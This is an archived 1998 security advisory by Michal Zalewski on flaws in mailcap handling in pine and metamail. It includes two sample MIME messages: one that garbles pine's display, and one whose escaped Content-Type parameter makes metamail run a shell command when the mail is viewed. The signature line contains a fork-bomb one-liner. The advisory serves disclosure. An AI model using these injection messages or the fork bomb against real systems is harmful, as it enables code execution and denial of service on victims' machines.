[ http://www.rootshell.com/ ] Date: Sun, 5 Apr 1998 15:25:25 +0200 From: Michal Zalewski Subject: mailrc and pine security holes Many of mailcap-compatible unix mail clients have several security holes. Mailcap mechanism is usually so poorly implemented that it's possible to perform wida range of attacks - from 'harmless' messing on screen, through executing specific commands with arbitrary parameters, even to executing *arbitrary* commands via e-mail message. Here are examples, both tested under Linux RH 5.0 distribution (mailcap 1.0.6, pine 3.96): ======================================== Example 1 (light) - pine 3.96 confusion ======================================= Following example demostrates how to cause a few 'mostly harmless' errors due to the improper expansion of ` character by pine - it's just annoying, because you can't view this mail properly, but I have no idea if it's exploitable: **** SAMPLE MIME MESSAGE **** MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01BD5F09.B6797740" ------=_NextPart_000_0007_01BD5F09.B6797740 Content-Type: text/plain; charset="crashme`" Content-Transfer-Encoding: quoted-printable Hellow! ------=_NextPart_000_0007_01BD5F09.B6797740-- **** END OF EXAMPLE *** =============================================== Example 2 (heavy) - execution of arbitrary code =============================================== That's something even more dangerous - following MIME mail, when viewed, executes 'touch /tmp/BIG_HOLE' (bug lies in metamail script): **** SAMPLE MIME MESSAGE **** MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01BD5F09.B6797740" ------=_NextPart_000_0007_01BD5F09.B6797740 Content-Type: default; encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE" Content-Transfer-Encoding: quoted-printable Hellow!!! ------=_NextPart_000_0007_01BD5F09.B6797740-- **** END OF EXAMPLE **** _______________________________________________________________________ Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] [echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]